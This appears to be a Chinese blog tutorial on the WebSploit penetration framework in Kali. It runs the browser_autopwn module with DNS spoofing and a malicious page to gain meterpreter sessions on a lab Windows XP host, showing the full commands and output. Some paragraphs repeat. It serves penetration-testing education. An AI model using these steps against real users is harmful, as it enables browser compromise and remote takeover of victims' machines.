20150916加註: exploit/browser_autopwn 在 Kali 2.0 中已經失效。
20190623加註: 因metasploit改變策略,已不再提供msfcli使用界面,而websploit自2014年以來亦未更版,目前websploit無法和metasploit整合使用,凡是使用到metasploit模組的部分都已失效。
做滲透測試的人對 metasploit 應該不陌生,這是一套滲透大全工具,而 WebSploit 則是仿 metasploit 開發、針對Web系統的滲透框架,操作程序也跟metasploit 相同,可以把 WebSploit 看做 metasploit 的子集。
20190623加註: 因metasploit改變策略,已不再提供msfcli使用界面,而websploit自2014年以來亦未更版,目前websploit無法和metasploit整合使用,凡是使用到metasploit模組的部分都已失效。
做滲透測試的人對 metasploit 應該不陌生,這是一套滲透大全工具,而 WebSploit 則是仿 metasploit 開發、針對Web系統的滲透框架,操作程序也跟metasploit 相同,可以把 WebSploit 看做 metasploit 的子集。
在 Kali 裡,可以從 「Web程序 \ Web應用漏洞挖掘 \ websploit」 進入或直接於終端機執行 websploit,進入後可利用 show modules 查看目前提供的模組有哪些,目前模組主要分成:
Web 類:進行網站的資訊收集
Network 類:針對網路通訊的攻擊,如 spoofing、DoS
Exploit 類:針對瀏覽器或作業系統漏洞編製惡意網站(需搭配社交工程)
Wireless/Bluetooth類:針對無線網路或藍芽的攻擊模組
Network 類:針對網路通訊的攻擊,如 spoofing、DoS
Exploit 類:針對瀏覽器或作業系統漏洞編製惡意網站(需搭配社交工程)
Wireless/Bluetooth類:針對無線網路或藍芽的攻擊模組
websploit 的使用程序也跟 metasploit 一樣:
use 模組
set OPTION VALUE
run
以 Exploit 模組中的 exploit/browser_autopwn 為例,操作如下:
set OPTION VALUE
run
wsf > use exploit/browser_autopwn wsf:Browser_Autopwn > show options Options Value RQ Description --------- -------------- ---- -------------- Interface eth0 yes Network Interface Name LHOST 192.168.1.1 yes Local IP Address wsf:Browser_Autopwn > set LHOST 192.168.158.135 INTERFACE => 192.168.158.135 wsf:Browser_Autopwn > run 執行模組 [*]Starting WebServer ... Please Wait ... [*]Configuration DNS Spoof ... [*]Creating Infected Page For Victim ... [*]Engine Has Been Started. [*] Initializing modules... 會自動載入 metasploit LHOST => 192.168.158.135 URIPATH => index [*] Auxiliary module execution completed [*] Setup [*] Obfuscating initial javascript 2014-12-17 09:12:56 +0800 中間過程是 websploit 透過 metasploit 載入漏洞利用模組 [*] --- Done, found 20 exploit modules [*] Using URL: http://0.0.0.0:8080/index [*] Local IP: http://192.168.158.135:8080/index [*] Server started. 如果有使用者不幸中計,開啟瀏覽器上網或瀏覽上面的網址,而且瀏覽器存在漏洞(IE6) 就會反彈回我們的 metasploit,利用 show sessions 就可以看到幾組成功 show sessions Active sessions =============== 總共有5組滲透成功 Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter java/java usertest @ XP_ORG 192.168.158.135:7777 -> 192.168.158.136:1044 (192.168.158.136) 2 meterpreter java/java usertest @ XP_ORG 192.168.158.135:7777 -> 192.168.158.136:1046 (192.168.158.136) 3 meterpreter java/java usertest @ XP_ORG 192.168.158.135:7777 -> 192.168.158.136:1054 (192.168.158.136) 4 meterpreter java/java usertest @ XP_ORG 192.168.158.135:7777 -> 192.168.158.136:1055 (192.168.158.136) 5 meterpreter java/java usertest @ XP_ORG 192.168.158.135:7777 -> 192.168.158.136:1056 (192.168.158.136) msf auxiliary(browser_autopwn) > sessions -i 1 把第1組移到前景 [*] Starting interaction with 1... meterpreter > ps 拿到了遠端機器的控制權 Process List ============ PID Name Arch User Path --- ---- ---- ---- ---- 0 System Idle Process NT AUTHORITY\System System Idle Process 4 System NT AUTHORITY\SYSTEM System 368 smss.exe NT AUTHORITY\SYSTEM smss.exe 492 alg.exe NT AUTHORITY\LOCAL SERVICE alg.exe (下以略) meterpreter > screenshot
在 meterpreter 下利用 screenshot 擷取受駭主機的螢幕畫面,證實滲透成功!
websploit 將 metasploit 的滲透步驟做包裝,讓我們執行滲透測試時不用執行許多步驟。
沒有留言:
張貼留言